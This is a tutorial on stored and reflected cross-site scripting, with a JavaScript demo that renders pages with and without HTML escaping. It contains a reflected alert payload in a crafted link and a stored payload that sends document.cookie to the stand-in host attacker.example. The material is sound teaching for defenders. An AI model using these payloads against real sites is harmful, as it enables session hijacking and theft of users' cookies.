- A web site may be vulnerable if a user can enter JavaScript through input fields and the submitted data is later rendered by another page inside HTML markup (not inside a textarea or text field, where it is shown as plain text).
- If the data is displayed that way, the attacker can store a malicious script in the database; when another user's browser renders the page, the script runs in that user's session and can read the cookie or session information.
- When a victim views the stored data through the other page, the script executes, collects the session information and sends it to the attacker's website. Cookies flagged HttpOnly cannot be read from script, which limits (but does not remove) what such a payload can steal.
A user can also be tricked into clicking a hyperlink that carries the script. The link injects the script into the application's response, so it executes within the application's origin and the browser's same-origin restrictions do not isolate it from the application's cookies and DOM.
Ex:
1) The web application runs at http://webappdomain/webapp/ and the user is logged in.
2) From another website, an e-mail or any other source, the user is tricked into clicking the following URL.
3) If clicked, the hyperlink carrying the script loads a page under the application's origin (webappdomain/webapp/), so the script executes there.
<a href="http://webappdomain/webapp/getdetails?clientno=1&station=1&code=1<script>alert('Hi');</script>">http://webappdomain/webapp/xxxx.jsp</a>
4) If the page loaded by that click prints the parameter 'code' into the HTML without escaping it, the script is injected into the page and executes.
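The following is an added example, not code from the original post or from the application it describes. It shows the two flaws discussed above side by side: the reflected case, where the page prints the 'code' parameter from the crafted link, and the stored case, where a payload saved through an input field is shown to other users later. The host name, parameter names and alert payload come from the post; the rendering functions, the constructed "database" rows and the attacker host attacker.example are assumptions for illustration.

```javascript
// Added example (not the original application's code). Demonstrates why
// printing untrusted data into HTML without escaping leads to XSS, and the
// fix: HTML-escape every untrusted value at the point of output.

// Escape the five characters that let text break out of an HTML text node
// or a double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The "getdetails" page from the post, rendered with a caller-supplied
// escape function. String (identity) reproduces the vulnerable page;
// escapeHtml is the hardened version.
function renderDetails(params, esc) {
  return `<p>Client: ${esc(params.clientno)}, station: ${esc(params.station)}, ` +
    `code: ${esc(params.code)}</p>`;
}

function renderVulnerable(params) { return renderDetails(params, String); }
function renderSafe(params) { return renderDetails(params, escapeHtml); }

// Extract the query parameters as the server would see them for the
// crafted link. The URL parser percent-encodes < > ' in the query, and
// URLSearchParams decodes them again, so the payload arrives intact.
function parseDetailsUrl(href) {
  const u = new URL(href);
  return {
    clientno: u.searchParams.get('clientno') ?? '',
    station: u.searchParams.get('station') ?? '',
    code: u.searchParams.get('code') ?? '',
  };
}

// The attacker's link from the post (reflected XSS).
const CRAFTED_LINK =
  "http://webappdomain/webapp/getdetails?clientno=1&station=1&code=1<script>alert('Hi');</script>";

// Constructed "database" rows for the stored variant: mallory's comment was
// accepted through an input field and is displayed later to other users.
// attacker.example is an assumed host.
const STORED_COMMENTS = [
  { user: 'alice', text: 'Looks good' },
  { user: 'mallory',
    text: "<script>document.location='http://attacker.example/?c='+document.cookie</script>" },
];

// Comment listing page, again with a caller-supplied escape function.
function renderComments(rows, esc) {
  return rows.map((r) => `<li>${esc(r.user)}: ${esc(r.text)}</li>`).join('\n');
}

// Render both pages both ways so the difference is visible.
function demo() {
  const params = parseDetailsUrl(CRAFTED_LINK);
  return {
    reflectedVulnerable: renderVulnerable(params),
    reflectedSafe: renderSafe(params),
    storedVulnerable: renderComments(STORED_COMMENTS, String),
    storedSafe: renderComments(STORED_COMMENTS, escapeHtml),
  };
}

const out = demo();
console.log(out.reflectedVulnerable); // live <script> tag in the page
console.log(out.reflectedSafe);       // same text, inert: &lt;script&gt;...
console.log(out.storedVulnerable);
console.log(out.storedSafe);
```

The escaping belongs at output time, in the page that prints the value, not only at input time: the stored payload in STORED_COMMENTS may have been saved before any input filter existed, or may have entered through another channel, and escaping on output neutralises it regardless of where it came from. Values placed in other contexts (inside a script block, a URL, or a CSS value) need the escaping rules of that context rather than the HTML-text rules shown here.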